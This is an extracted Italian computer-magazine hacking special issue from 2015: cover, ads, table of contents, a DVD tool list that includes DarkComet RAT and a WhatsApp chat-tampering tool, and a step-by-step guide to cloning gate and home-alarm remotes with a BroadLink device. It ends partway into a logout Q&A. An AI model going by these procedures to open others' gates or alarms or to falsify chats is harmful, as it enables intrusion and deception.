Вы находитесь на странице: 1из 100

Dagli autori della rivista di informatica e tecnologia pi venduta in Italia

Poste Italiane Spedizione in A.P. - 45% Art. 2 Comma 20/B Legge 662/96 - Aut. N. DCDC/035/01/CS/CAL

Anno VII, n.ro 6 (21) - Periodicit bimestrale - DICEMBRE 2015/GENNAIO 2016

SPECIALI

Magazine

HACKER
LA GUIDA PROIBITA
Scopri le tecniche e i tool usati dai pirati per prendere
il pieno controllo di qualsiasi dispositivo hi-tech
Spiare PC,
smartphone
e tablet

Taroccare
la chat di
Whatsapp
Violare
antifurti, porte
e cancelli

Guardare
gratis le
pay TV
Scaricare app
senza sborsare
un euro

Sbloccare
la console
col PC

Winblu consiglia Windows.

FEEL

BLU

Prestazioni ruggenti, velocit e grinta da vendere: una potenza


che si vede e si sente ed tutta al servizio delle tue esigenze.
Con i personal computer Winblu non devi scendere mai a
compromessi: prestazioni brillanti in qualsiasi contesto duso,
massima affidabilit, un design funzionale, un look accattivante
ed un rapporto qualit/prezzo che non teme confronti.
Unampia scelta di soluzioni efficienti e versatili, perfette sia per
la casa che per lufficio.

Intel, il Logo Intel, Intel Core e Core Inside sono marchi registrati da Intel Corporation negli Stati Uniti e in altri Paesi.

Winblu: levoluzione della specie PC.

Intel all'interno per potenti soluzioni all'esterno

Personal Computer Winblu linea Expert


con processore Intel CoreTM i7.

Scegli tecnologia Made in Italy.


I PC Winblu sono prodotti in Italia da una fabbrica certificata ISO 9001:2008 (Vision)

PROFESSIONAL COMPUTERS

I PC Winblu li trovi nei migliori negozi di personal computer.


Cerca il tuo rivenditore qualificato Winblu allindirizzo http://www.winblu.it/punti-vendita/

www.winblu.it
info@winblu.it

Sommario
SPECIALI

Win Magazine Speciali


Anno VII - n.ro 6 (21) - DICEMBRE 2015/GENNAIO 2016
Periodicit bimestrale
Reg. Trib. di Cs: 741 del 6 Ottobre 2009
Cod. ISSN: 2037-1608
e-mail: winmag@edmaster.it
www.winmagazine.it
DIRETTORE EDITORIALE: Massimo Mattone
DIRETTORE RESPONSABILE: Massimo Mattone
RESPONSABILE EDITORIALE: Gianmarco Bruni
EDITOR: Carmelo Ramundo
REDAZIONE: Paolo Tarsitano, Giancarlo Giovinazzo, Raffaele del Monaco

Magazine

SEGRETERIA DI REDAZIONE: Rossana Scarcelli


REALIZZAZIONE GRAFICA: CROMATIKA s.r.l.
RESPONSABILE GRAFICO DI PROGETTO: Salvatore Vuono
RESPONSABILE PRODuZIONE: Giancarlo Sicilia
AREA TECNICA: Dario Mazzei
ILLuSTRAZIONI: Tony Intieri
IMPAGINAZIONE: E. Monaco, L. Ferraro, F. Maddalone, T. Diacono

hacker
La guida proibita
Scopri le tecniche e i tool usati dai pirati per prendere
il pieno controllo di qualsiasi dispositivo hi-tech

PuBBLICIT: MASTER ADVERTISING s.r.l.


Viale Andrea Doria, 17 - 20124 Milano - Tel. 02 83121211
Fax 02 83121207
advertising@edmaster.it
EDITORE: Edizioni Master S.p.A.
Via B. Diaz, 13 87036 RENDE (CS)
PRESIDENTE E AMMINISTRATORE DELEGATO: Massimo Sesti
ARRETRATI
ITALIA
Costo arretrati (a copia): il prezzo di copertina + E 6,10
(spedizione con corriere).
Prima di inviare i pagamenti, verificare la disponibilit delle copie arretrate
inviando una e-mail ad arretrati@edmaster.it e la copia del pagamento
potr essere inviata via email o via fax al n. 199.50.00.05. La richiesta contenente i Vs. dati anagrafici e il nome della rivista, dovr essere inviata via
fax al num. 199.50.00.05* oppure via posta a EDIZIONI MASTER S.p.A. Viale
Andrea Doria, 17 - 20124 Milano, dopo avere effettuato il pagamento, secondo le modalit di seguito elencate:
- assegno bancario non trasferibile (da inviare in busta chiusa con la richiesta);
- carta di credito, circuito Visa, Cartas, o Eurocard/Mastercard (inviando la Vs. autorizzazione, il numero di carta, la data di scadenza, lintestatario della carta e il codice
CVV2, cio le ultime 3 cifre del codice numerico riportato sul retro della carta).
- Bonifico bancario intestato a EDIZIONI MASTER S.p.A. c/o BANCA DI CREDITO COOPERATIVO DI CARuGATE E INZAGO S.C. - IBAN IT47R0845333200000000066000
(inviare copia della distinta insieme alla richiesta).

SOSTITuZIONE: Qualora nei prodotti fossero rinvenuti difetti o imperfezioni che ne limitassero la fruizione da parte dellutente, prevista la sostituzione gratuita, previo invio
del materiale difettato. La sostituzione sar effettuata se il problema sar riscontrato e
segnalato entro e non oltre 10 giorni dalla data effettiva di acquisto in edicola e nei punti
vendita autorizzati, facendo fede il timbro postale di restituzione del materiale.
Inviare il supporto difettoso in busta chiusa a:
Edizioni Master - Servizio clienti Viale Andrea Doria, 17 - 20124 Milano

Servizio Clienti
servizioclienti@edmaster.it
199.50.00.05*

sempre in funzione

Spiare PC,
smartphone
e tablet

Taroccare
la chat di
Whatsapp

Guardare
gratis le
pay TV

199.50.50.51*

dal luned al venerd 10.00 -13.00

*Costo massimo della telefonata 0,118 + iva a minuto di conversazione, da rete fissa,
indipendentemente dalla distanza. Da rete mobile costo dipendente dalloperatore utilizzato.

ASSISTENZA TECNICA (e-mail): winmag@edmaster.it


STAMPA: ROTOPRESS INTERNATIONAL S.r.l.
Via Mattei, 106 - 40138 - Bologna
DuPLICAZIONE SuPPORTI: Ecodisk S.r.l. - Via Enrico Fermi, 13
Burago di Molgora (MB)
DISTRIBuTORE ESCLuSIVO PER LITALIA:
m-dis distribuzione media S.p.A. - via Cazzaniga, 19 - 20132 Milano
tel: 02/25.82.1
Finito di stampare nel mese di Novembre 2015

Violare
antifurti, porte
e cancelli

Scaricare app
senza sborsare
un euro

Sbloccare
la console
col PC

Nessuna parte della rivista pu essere in alcun modo riprodotta senza autorizzazione scritta di Edizioni Master. Manoscritti e foto originali anche se non pubblicati non si restituiscono. Edizioni Master
non sar in alcun caso responsabile per i danni diretti e/o indiretti derivanti dallutilizzo dei programmi
contenuti nel supporto multimediale allegato alla rivista e/o per eventuali anomalie degli stessi. Nessuna responsabilit , inoltre, assunta da Edizioni Master per danni derivanti da virus informatici non
riconosciuti dagli antivirus ufficiali allatto della masterizzazione del supporto. Nomi e marchi protetti
sono citati senza indicare i relativi brevetti. Windows un marchio registrato di Microsoft Corporation.

ech it

ec

Sommario
Il telecomando dellhacker . . . . . . .08
senza tasti, Wi-Fi e sblocca antifurti, scardina
porte, cancelli e manda in tilt luci e condizionatori
di casa!

Il logout lo faccio da remoto! . . . . . 13

Geolocalizza i tuoi amici! . . . . . . . . 33


Esiste un modo per scoprire da dove mi sta
scrivendo un mio contatto sul social network?
Qual la procedura per disattivare la
localizzazione degli utenti su Facebook?

in tempo reale senza avviarne il download sul


nostro computer!

Libri gratuiti sul social network . . . 70


Ti sveliamo il canale segreto dove leggere senza
limiti e pubblicare le tue opere per condividerle con
chiunque

Posso disconnettermi da Gmail in caso in cui


abbia lasciato aperta la sessione su un altro
computer?
Esiste un modo per fare la stessa cosa su
Facebook?

Ti infetto il PC con un clic! . . . . . . . . 34

Con la pendrive entro nel tuo PC . . .14

Naviga in Rete a tutto gas . . . . . . . . 36

Ecco come accedere al nuovo servizio Apple Music


per ascoltare tutte le hit del momento su PC, tablet
e smartphone

Ecco come configurare e ottimizzare lADSL di casa


per sfrecciare su Internet

Il passepartout musicale! . . . . . . . . 74

Mi bastano 5 minuti per entrare nei tuoi sistemi


sfruttando vulnerabilit e bug di Windows

Cos ti spio da cellulare


e webcam . . . . . . . . . . . . . . . . . . . . . 22
Un pirata si confessa e ci svela come in pochi passi
riesce ad entrare in un telefonino e catturare foto,
video e audio

Cos ti sbircio dal tuo telefonino! . . . 24

Di default Windows non visualizza le estensioni dei


file noti. Cos i creatori di malware ne approfittano
per infettare i PC

Giochi sul PC a costo zero . . . . . . . .40


C' un modo per divertirsi con i videogiochi pi hot
del momento senza sborsare un centesimo

Console: upgrade sblocca-tutto . . .42


Cos i pirati aggiornano le loro Xbox modificate per
continuare a giocare gratis con i nuovi titoli

Fai il pieno di musica gratis . . . . . . 72

C un modo sconosciuto ai pi per comandare


a distanza computer e smartphone altrui
utilizzando la voce e i suoni. Provare per credere

Dal DVD Video al CD Audio . . . . . . . 78


Ecco come estrarre i brani audio dai nostri video
preferiti per creare una compilation musicale
personalizzata

Usando lapp Cerberus per Android possiamo


origliare le conversazioni delle nostre vittime e
scoprire il luogo in cui si trovano

Hacking Team: vediamoci chiaro! .46

La Webcam del PC ti spia


da remoto . . . . . . . . . . . . . . . . . . . . . 26

Passepartout per i pirati . . . . . . . . . 49

Trovato il modo per accedere alla cronologia delle


chat, manipolare i testi delle conversazioni e
rovinare la reputazione altrui

Provato il tool buca-Flash che entra in qualunque


computer, in barba agli antivirus, ai firewall e a tutti i
tool di sicurezza

Cos ti sgamo
il numero nascosto . . . . . . . . . . . . .84

Cinema in HD su tablet
e console . . . . . . . . . . . . . . . . . . . . . . 52

C un modo segreto per scoprire lidentit e il


numero di chi ti telefona con lanonimo. Ecco
come fare

Trasforma il PC in unemittente TV che trasmette


film e serie TV on-demand a tutti i tuoi dispositivi

Scarica a mille col cellulare . . . . . . . 87

I tuoi segreti in una foto . . . . . . . . . 29

eMule &Torrent lunione


fa la forza! . . . . . . . . . . . . . . . . . . . . . 58

Ti regaliamo l app per gestire al meglio i download


con lo smartphone Android, anche dalle reti Peer
to Peer

Ecco cosa abbiamo scoperto analizzando le


immagini digitali catturate con le nuove reflex e
digicam dotate di modulo GPS

Abbiamo scovato il software per accedere


contemporaneamente a tutte le reti Peer to Peer.
Provare per scaricare a mille!

Arriva il virus che spia tutti . . . . . . 30

TV in chiaro sul mio PC . . . . . . . . . .60

Su Internet sta infuriando una guerra cibernetica.


Il pericolo si chiama Regin, un supertrojan che da
anni spia governi e industrie. Vediamo di cosa si
tratta

Ecco come trasformare il computer in un decoder


per visualizzare i canali satellitari e del digitale
terrestre

Quello che devi sapere


sui metodi di criptazione . . . . . . . . 32

TeleVisioni da hacker . . . . . . . . . . . .64

Un pirata informatico ci ha mostrato quanto facile


prendere possesso degli account altrui e leggerne
tutti i messaggi. Eccoti svelate tutte le nuove
tecniche

Ecco la piattaforma usata dai pirati per vedere gratis


serie TV e film in prima visione

Fai incetta di app a costo zero . . . . 96

Con i software giusti possiamo controllare la


videocamera dei PC altrui e ascoltare tutto ci che
viene captato dal microfono

Ti sorveglio o ti spio? . . . . . . . . . . . 28
Le IPCam vengono usate per sorvegliare la casa ma
non sempre sono sicure. Ecco come un estraneo
potrebbe violare la nostra privacy

Chiunque desideri rendere inaccessibili ai servizi


segreti e affini le proprie e-mail o le fotografie dovr
criptarle tramite uno dei tanti metodi disponibili

I retroscena dello scandalo che ha portato alla luce


il Datagate italiano sulle intercettazioni illegali

Film: guardali senza scaricarli . . . .68


Scopriamo come guardare i video dalla rete torrent

Cos ti taroccano
le chat Whatsapp . . . . . . . . . . . . . .80

Il cellulare spia qualsiasi PC . . . . . . 89


C chi sbircia nei nostri dati intercettando le onde
radio del monitor. Svelati i retroscena

Cos ti spio WhatsApp! . . . . . . . . . . 92

Abbiamo testato in anteprima il nuovo store


Amazon dal quale poter scaricare gratis anche le
app a pagamento

I prezzi di tutti i prodotti riportati allinterno della rivista potrebbero subire variazioni e sono da intendersi IVA inclusa
4 Win Magazine Speciali

Grande novit

facili e veloci con il tuo

il marchio Bimby di titolarit della societ


Vorwerk International AG che ne detiene tutti i diritti

i
c
l
o
D
e
e
t
r
o
Speciale T
Un nuovo libro ricettario
con i dolci pi gustosi e sfiziosi
da realizzare con il Bimby.
E poi, i consigli pratici
e le dritte della Scuola
per diventare dei veri esperti.

un imperdibile libro con


pagine di ricette
passo passo

144
Scoprilo in

edicola

Il software sul DVD-Rom


SPECIALI

cFosSpeed 10.08

Il programma che mette il


turbo alla tua connessione
Internet

File: cfosspeed.zip

server multimediale DNLA

File: Plex-Media-Server.zip

Digital Secret TV

Il sistema unico per vedere


tutti i canali Tv in chiaro

Simple Port
Forwarding

Aprire le porte del proprio


router in pochi clic

File: simple_port_forwarding_setup.zip

File: Kodifull.zip

NextPvr

Vedere, gestire e registrare la


TV da Internet

Magazine

File: NPVRSetup.zip

Origin Client

DarkComet RAT
Legacy

Gioca gratis e scarica i migliori titoli del momento

Controllo remoto del computer

File: OriginThinSetup.zip

File: Dark Comet.zip

FFdshow

Migliora la qualit dei filmati


compressi

File: FFdshow.zip

Plex Media Server 0.9.12

Spybot - Search &


Destroy 2.4

Trasforma il computer in un

INCLUDE

DvD da 4,3 GB
PRoDottI CoMPLEtI

Flutter 0.7.22

Controlla il tuo PC senza


mouse e tastiera

File: Flutter.zip

WhatshaCk

Cos ti taroccano le chat Whatsapp

Basta mettere le mani sullo smartphone per i pochi secondi sufficienti a copiare sul proprio PC il database con tutti i messaggi archiviati, modificarne
qualcuno, aggiornare l'archivio e rimettere tutto a posto. doveroso precisare che possibile effettuare tale modifica solo su dispositivi Android ai quali
siano stati concessi i permessi di super user, il noto "root" per intenderci. La
"magia" resa possibile dal fatto che Whatsapp memorizza i messaggi in un
DB non crittografato, in una directory del sistema operativo. Si tratta quindi di
prelevare tale file, modificarlo e reinserirlo all'interno dell'app sul dispositivo,
cosicch le conversazioni risultino manipolate rispetto a quelle originale.
S.O.: Windows XP/Vista/7/8/8.1/10 File:WhatsHack.rar

PENtEst Box

Basta una Pendrive USB per "penetrare" nei computer

Pentest Box una piattaforma per il penetration test creata specificamente per i
sistemi Windows. Pentest Box viene distribuita come un archivio RAR compresso da 2,5 GB, non richiede installazione e pu essere decompressa sia su disco, sia su una pendrive USB. importante sapere che l'antivirus del nostro PC
potrebbe segnalare la presenza di minacce dovute alle tracce di alcuni exploit.
Possiamo scegliere di ignorare queste segnalazioni o anche di rimuovere i file,
ma, nel secondo caso, alcuni test non saranno disponibili.
S.O.: Windows XP/Vista/7/8/8.1 File: PentestBox-1.2.rar
6 Win Magazine Speciali

Il software sul DVD-Rom


Pulizia completa da spyware
e malware per il PC

File: spybot.zip

Adobe Shockwave
Player 12.2

uTorrent 3.4.5

Player multimediale per i


contenuti Web

Sfrutta la rete Torrent per


scaricare sempre al massimo

File: uTorrent.zip

File: Shockwave_Installer_Full.zip

Adobe Acrobat
Reader DC

File: AcroRdrDC1500720033_it_IT.zip

Naviga e scarica da Internet


senza lasciare tracce

Ripulisci a fondo il computer


da file inutili e obsoleti

File: ccsetup.zip

File: torbrowser-install-5.0.3_it.zip

Adobe Flash Player 18

Visualizza correttamente le
pagine Web

File: install_flashplayer18.ZIP

Testa i tuoi CD e DVD e masterizzali in sicurezza

Editor di testo avanzato per


il Web

xxxxxxxxx

TV Dream Player 0.7.72


TV gratis e legale su PC,
smartphone e tablet

O&O ShutUp 10

50 impostazioni per migliorare la privacy su Windows 10

File: OOSU.zip

File: TVdream-Setup.zip

7-Zip 9.20

Creazione e gestione veloce


di archivi compressi

K-Lite Codec Pack


Mega 11.40

Notepad++ 6.8.3

File: DTLiteInstaller.zip

CCleaner 5.10.5373

TOR Browser 5.0.3

Gestione completa dei PDF


con supporto cloud

Daemon Tools
Lite 10.1.0

Tutti i codec per riprodurre


sul PC musica e video

File: 7zip.zip

File: K-Lite_Codec_Pack_1140_Mega.zip

VLC Media Player 2.2.1

Il player multimediale numero uno si aggiorna!

File: vlc-2.2.1-win.ZIP

Spybot Anti-Beacon

Avira Antivirus
Freeware 2015

Sicurezza totale dai pericoli


di Internet... anche su mobile

Bloccare la condivisione di
informazioni personali

File: SpybotAntiBeacon.zip

File: avira_free_antivirus_it.zip

Junkware
Removal Tool 7.6.3

Piazza pulita delle toolbar


indesiderate dal browser

File: JRT.zip

ashaMPoo MUsIC stUDIo 5

Trasforma il PC in una sala di registrazione

Ashampoo Music Studio 5 una suite per l'editing


musicale, che include decine di strumenti professionali. Permette, ad esempio, di creare la nostra personalissima compilation sonora estraendo l'audio
da un DVD video. Grazie alla semplice all'interfaccia
possiamo editare i brani audio, tagliarli e organizzarli
in tracce separate. Non finisce qui: si possono anche
realizzare mixaggi di pi brani, masterizzare CD audio e registrare l'audio quando si canta o mente si
suona uno strumento musicale.

DEtEkt

Per scovare spyware e trojan governativi

Detekt un nuovo potente scanner antivirale che


si occupa di scovare i trojan governativi e altri programmi di spionaggio intrufolati nel PC. Oltre a
Regin,infatti, altri trojan escogitati dai governi, possono tenere sotto controllo: PC di altri utenti, fotocamera e microfono, nonch vigilare su servizi di chat o
immissioni di dati. Il software gratuito Detekt per
lo meno in grado di rintracciare e segnalare questi
programmi di spionaggio. Questa suite consigliata
da organismi come Amnesty International.
S.O.: Windows XP/Vista/7/8/8.1

File: detekt.zip

S.O.: Win XP/Vista/7/8/8.1


File:ashampoo_music_studio_5_19220

aCE stREaM MEDIa 3.0

Guarda gratis e in HD la TV in streaming HD

Ecco un lettore multimediale basato su VLC e compatibile con il protocollo BitTorrent (P2P) per vedere
TV in streaming o live broadcast in HD. Grazie ad
Ace Stream Media i pirati riescono a guardare i film
.torrent direttamente in streaming, senza scaricarli
sul PC. In altre parole, utilizzando Ace Stream media
aggiungono alle potenzialit di VLC la funzione di
riproduzione online di audio e video distribuiti sulla
rete BitTorrent. Questo potente player alle funzioni
di streaming aggiunge le stesse funzioni di VLC.
S.O.: Windows XP/Vista/7/8/8.1 File: Ace_Stream_Media.zip
Speciali Win Magazine 7

Cos fa lhacker

| Fai da te | Il telecomando magico dellhacker |

Il telecomando
dellhacker

Cosa ci
occorre

40 min.
FaCile

Controller Wi-Fi

BroadLink
rM Pro

Quanto costa: 35,00


Sito internet:
www.banggood.com

senza tasti, Wi-Fi e sblocca antifurti, scardina porte,


cancelli e manda in tilt luci e condizionatori di casa!

o scorso mese di luglio, il giornalista


americano Andy Greenberg stato il
protagonista (o forse sarebbe meglio
dire la cavia) di un esperimento condotto da
Charlie Miller e Chris Valasek, due hacker
specializzati in sicurezza automobilistica
che sono riusciti a prendere il controllo a
qualche chilometro di distanza, via Internet, della Jeep Cherokee guidata da Greenberg, mandandola fuori strada! Il clamore
fu grande, tanto da costringere il gruppo
automobilistico FCA ad un richiamo di alcuni
modelli venduti negli Stati Uniti. Lesperimento, condotto ovviamente in condizioni
di assoluta sicurezza e soltanto dopo aver
informato la stessa Casa automobilistica,

serv ad accendere i riflettori sullestrema


vulnerabilit dei sistemi elettronici di bordo
che vengono montati sulle nostre automobili.

Mi hanno aperto lauto


con il cellulare!
La Jeep Cherokee, infatti, non lunica autovettura attaccabile da remoto. Durante
lultima Def Con Hacking tenutasi a Las Vegas lo scorso agosto (www.defcon.org), ad
esempio, lattenzione della comunit hacker
e dei tanti appassionati stata attirata da
uno strano aggeggio capace di hackerare le
centraline delle autovetture consentendo
lapertura delle portiere senza lutilizzo del

Il RollJam che apRe la nostRa auto


Ecco il RollJam con cui il ricercatore Samy Kamkar riuscito ad
aprire i finestrini e le portiere di
alcune automobili. Il dispositivo
in realt un jammer (disturbatore
di frequenze) composto da tre
moduli radio: due di questi intercettano il segnale proveniente
dal telecomando dellauto della
vittima per evitare che arrivi alla
centralina di bordo. Il terzo, invece, non solo intercetta il segnale,
ma registra anche le informazioni
inviate. In uno scenario reale, il
proprietario dellauto prova ad
aprire o chiudere le portiere senza riuscirci (in quanto il segnale
viene intercettato dal RollJam) e

Il RollJam costruito usando


semplici componenti elettronici
facilmente reperibili su Internet
o nei negozi specializzati, per
un costo complessivo di circa 35
euro. Ulteriori informazioni le
troviamo sul sito http://samy.pl.

8 Win Magazine Speciali

quindi riprova. Al secondo tentativo, il segnale viene di nuovo intercettato ma il jammer a


questo punto invia alla centralina dellauto il primo segnale

lasciando credere al proprietario


dellauto che tutto abbia funzionato correttamente. A questo
punto il malintenzionato riuscir
ad aprire le portiere dellautomobile utilizzando il secondo codice
inviato dal telecomando.

telecomando di fabbrica, ma sfruttando un


semplice collegamento col cellulare. Il Roll
Jam, questo il suo nome, un piccolo dispositivo elettronico realizzabile con una
spesa di circa 30 euro e con un minimo di
competenza elettronica, capace di interagire
con le centraline di molti modelli di automobili sfruttando un bug che i costruttori
conoscevano gi da tempo (leggi il box Il
RollJam che apre la nostra auto). A darne la
dimostrazione pratica davanti a decine di
persone stato Samy Kamkar, il ricercatore
che lo ha realizzato e che era gi salito agli
onori della cronaca per essere riuscito ad
hackerare il sistema di infotainment OnStar
montato su molti modelli di Opel.

Configuriamo
Linstallazione del BroadLink RM PRO non
Fatto questo, dovremo creare un account

alimentiamo il telecomando

Colleghiamo al BroadLink il cavo USB


fornito in dotazione nella confezione del
dispositivo. Recuperiamo poi un adattatore di
corrente da 5 volt e 1 Ampere con presa italiana (quello fornito dal produttore, infatti, di tipo
inglese). Colleghiamo il tutto alla rete elettrica.

| Il telecomando magico dellhacker | Fai da te |

Cos fa lhacker

ecco lo schema dI funzIonamento del BRoadlInk Rm pRo


Innanzitutto necessario installare sullo
smartphone Android o iOS lapp e-Control che
permette di interfacciarsi con il dispositivo.
Successivamente, colleghiamo il BroadLink
ad una presa elettrica o ad un dispositivo con
ingresso USB (notebook o PC, ad esempio).
quindi necessario creare un account sul sito

della BroadLink: cos facendo, verr creata una


rete privata VPN (Virtual Private Network) tra il
nostro account e il controller per poterlo gestire
in sicurezza anche da remoto. Il dispositivo
pu ora essere connesso al router Wi-Fi di casa
e impostato in modalit programmazione per
poter intercettare e clonare il segnale dei vari

telecomandi. Ovviamente, se decidiamo di


controllare il dispositivo da remoto necessario
che il router Wi-Fi a cui connesso sia a sua volta
collegato alla linea ADSL. Se invece vogliamo
usare il BroadLink solo allinterno delle mura
domestiche, possiamo anche scollegare il cavo
di rete e lasciare aperto il Wi-Fi.

il dispositivo di controllo remoto


richiede particolari accortezze: sufficiente collegarlo alla rete elettrica, accenderlo e seguire la procedura sotto indicata.
gratuito per poter utilizzare il telecomando magico anche quando non siamo in casa.

Ecco lapp di controllo

Dallo smartphone scarichiamo lapplicazione e-Control (disponibile per Android


e iOS). Attiviamo il Wi-Fi di casa, connettiamo il
telefono e avviamo lapp. In automatico verranno
rilevati il dispositivo e la rete. Nella nuova schermata digitiamo la password di accesso al Wi-Fi.

attiviamo tutte le funzioni

Dalla schermata iniziale entriamo nel


menu (tasto in alto a sinistra) e clicchiamo Login for more functions. Inseriamo un indirizzo e-mail, una password, uno username e tappiamo Sign in. Grazie alla registrazione saremo in
gradi di controllare i dispositivi anche da remoto.

il telecomando pronto

Tappiamo adesso sul pulsante Configure


per connettere il BroadLink alla rete Wi-Fi
domestica. A questo punto siamo pronti per iniziare
ad utilizzare il nostro magico dispositivo. Per scoprire come, non dobbiamo fare altro che continuare a
leggere i tutorial delle prossime pagine.
Speciali Win Magazine 9

Cos fa lhacker
La realt supera la fantasia
In termini pratici, il RollJam in grado di
intercettare i codici di blocco/sblocco che
il telecomando originale trasmette allauto.
Tale segnale viene quindi inviato alla centralina effettuando una serie di interrogazioni,
al termine delle quali si riesce ad aprire lau-

| Fai da te | Il telecomando magico dellhacker |

tovettura (altrui) utilizzando un semplice


smartphone. Per fortuna, verrebbe da dire,
che un tale dispositivo al momento catalogabile come un semplice esperimento da
laboratorio: se fosse cos semplice controllare
e pilotare da remoto qualsiasi automobile ci
sarebbe davvero di che preoccuparsi! E se

Tappiamo sullicona +
in alto a destra nellinterfaccia principale dellapp e-Control e
scegliamo Add remote
dal menu. Selezioniamo Light e impostiamo le funzionalit On e
Off, come se si volesse impostare un nuovo
controllo.

invece scoprissimo che allo stesso prezzo


gi in commercio un dispositivo simile
al RollJam, gi configurato e predisposto
per la cattura di codici? Come nei migliori
racconti horror, gli incubi prendono forma:
il telecomando magico dellhacker si chiama
BroadLink RM PRO e viene dalla Cina. Si trat-

Posizioniamo il telecomando di fronte al BroadLink e premiamo Power


per clonare il segnale di
accensione/spegnimento. Ovviamente linterruttore delle luci deve avere
un controller RF o IrDA.
Ripetiamo la procedura
per clonare le funzioni
anche degli altri tasti.

Lo abbiamo
utilizzato con:
presa
radiocomandata
dimmer
Home Easy

LUCI DI CASA
ConDIzIonAtore

Lo abbiamo
utilizzato con:
condizionatore
a parete LG

10 Win Magazine Speciali

Tappiamo sullicona
+ che troviamo in alto
a destra nellinterfaccia principale dellapplicazione e-Control e
scegliamo la voce Add
remote dal menu contestuale che appare.
Tappiamo cloud aircon
e impostiamo il tasto
Power.

Posizioniamo il telecomando di fronte al BroadLink e premiamo


Power. Lasciamo il BroadLink nelle vicinanze del
condizionatore (un paio di
metri) e diamo il comando di accensione/spegnimento. Ovviamente procediamo a configurare
anche gli altri tasti.

| Il telecomando magico dellhacker | Fai da te |

Cos fa lhacker
Tappiamo sul + in alto
a destra nellinterfaccia
dellapp e-Control e scegliamo Add remote. Tappiamo TV e impostiamo
le funzionalit On e Off
e quelle per il cambio
canale. Di solito i telecomandi TV sono infrarossi
e il BroadLink deve essere nelle vicinanze del TV.

Posizioniamo il telecomando del televisore di fronte al BroadLink e premiamo il


tasto Power per clonare il segnale di accensione/spegnimento del
dispositivo. Ripetiamo
la stessa procedura per
clonare i tasti che regolano il volume.

Lo abbiamo
utilizzato con:
un televisore Toshiba

TELEVISORE
Lo abbiamo
utilizzato con:
per motivi disicurezza
non indichiamo
il modello di cancello

CANCELLO ELETTRONICO
ta di un piccolo strumento dotato di una serie di
sensori posti su tutti i lati (in modo da avere un
raggio di azione a 360 gradi) che, combinato con
lo smartphone, riesce a clonare il segnale dei vari
tipi di telecomandi e controllare dispositivi che
utilizzano segnali a infrarossi (IrDA) e radio fre-

Tappiamo sul + in alto


a destra nellinterfaccia principale dellapp
e-Control e scegliamo
Add remote dal menu.
Tappiamo su Userdefined A. Posizioniamo il
telecomando di fronte
al BroadLink e premiamo il tasto Power per
clonarne il segnale.

quenze (RF) come TV, decoder, condizionatori


e cancelli (il dispositivo non compatibile con i
telecomandi di tipo rolling code che generano
un codice operativo diverso ad ogni impulso).
Se utilizzato correttamente, il BroadLink pu
diventare il vero centro di controllo della no-

Indirizziamo il tasto di
apertura del cancello verso il BrodaLink e
memorizziamo il segnale. Avviciniamoci adesso al sensore del cancello e tappiamo Power
in e-Control. Ovviamente, se il telecomando ha
anche altri tasti, cloniamo
anche questi.

stra casa domotica. Ma se dovesse finire nelle


mani sbagliate, aprirebbe scenari terrificanti!
Ecco perch abbiamo deciso di testarlo a fondo
provando a clonare tutti i telecomandi di casa: il
risultato lo trovate in queste pagine. Anticipiamo soltanto che ha funzionato perfettamente!
Speciali Win Magazine 11

Cos fa lhacker

| Fai da te | Il telecomando magico dellhacker |

Tappiamo sul + in alto


a destra nellinterfaccia principale dellapp
e-Control e scegliamo Add remote dal
menu che verr aperto. Il dispositivo funziona anche su antifurti di
casa. Basta tappare su
TC1 e memorizzare la
frequenza di On e Off.
Posizioniamo il telecomando dellantifurto di casa di fronte al
BroadLink e premiamo il tasto Power per
clonare il segnale di
accensione/spegnimento. Ripetiamo la
procedura per clonare
anche gli altri tasti del
dispositivo.

Lo abbiamo
utilizzato con:
Per motivi di sicurezza non
indichiamo il modello di antifurto usato. Diciamo solo che si tratta di un dispositivo dotato di SIM
per il controllo da remoto

ANTIFURTO
Volendo riprodurre il funzionamento del dispositivo RollJam di
cui parlavamo allinizio dellarticolo, abbiamo condotto alcuni
test su diversi modelli di automobile, sia recenti sia di qualche
anno fa. In alcuni casi, il BroadLink riuscito ad intercettare il segnale del telecomando, ma senza riuscire poi a riprodurlo. Altre volte, invece, il segnale non veniva in alcun modo
memorizzato. Lesperimento, dunque, si pu considerare non
riuscito. La spiegazione che i telecomandi delle automobili sono di tipo rolling code che generano codici di controllo
che cambiano ad ogni utilizzo e scadono se non utilizzati
a breve. La delusione nel non essere riusciti ad hackerare la
nostra automobile stata tanta, ma almeno abbiamo avuto
la conferma che dispositivi come il RollJam sono per adesso
utilizzabili solo a livello sperimentale: potremo quindi continuare a guidare la nostra vettura in tutta serenit al riparo da
possibili attacchi informatici!

Lo abbiamo
utilizzato con:
diversi modelli
di automobile di varie
case automobilistiche

AUTOMOBILE
12 Win Magazine Speciali

Cos fa lhacker

| Una risposta a tutto |

Il logout lo faccio da remoto!


Posso disconnettermi da Gmail in caso in cui abbia
lasciato aperta la sessione su un altro computer?
Esiste un modo per fare la stessa cosa su Facebook?
SERVE A CHI
... utilizza postazioni condivise con
altri utenti e vuole terminare
eventuali sessioni lasciate aperte
su Gmail e Facebook
egli smartphone venduti nel mondo
circa il 60% sono dispositivi Android.
Come molti di noi sicuramente sanno, per
poter utilizzare correttamente un telefonino
dotato di questo OS necessario disporre di
un account Gmail da usare per sincronizzare
tutti i dati sul cellulare. E-mail, contatti della
rubrica e, nel caso di utilizzo di Google Drive,
foto e documenti, saranno associati al nostro
account e accessibili grazie ad esso. Proprio
per questo Google ha pensato di implementare un sistema di sicurezza che protegga al
meglio i dati sensibili degli utenti.

Accessi on-line in sicurezza


Il colosso di Mountain View mette infatti a

disposizione opzioni avanzate per il recupero dellaccount e un sistema di verifica in


due passaggi per laccesso in modo tale da
limitare al massimo la possibilit che venga
violato. Quando si parla di dati sensibili bisogna considerare anche i social network. Ogni
giorno condividiamo foto, luoghi di nostro
interesse e altro senza pensare che queste
informazioni possano finire nelle mani di
terzi in caso di violazione degli account.
Facebook, al pari di Google, offre molte
funzioni di protezione e sicurezza, come la
possibilit di inserire il proprio cellulare per
ripristinare laccesso al profilo o, addirittura,
utilizzare dei contatti preferiti dei quali ci
fidiamo per recuperare le nostre credenziali
in caso di accesso non autorizzato.

Attenzione al logout
Generalmente uno degli accorgimenti da
seguire riguarda laccesso allaccount del
social network da postazioni che non siano
quelle di solito utilizzate o, ancor peggio, da
postazioni condivise con altri utenti. Questo

perch, nel caso in cui si ci dimenticassimo di


effettuare il logout una volta utilizzati Gmail
o Facebook, chiunque avrebbe la possibilit
di entrare con le nostre credenziali e tutti i
nostri accorgimenti di sicurezza sarebbero
stati vani. Proprio per questo motivo prevenire questi casi Gmail e Facebook offrono la
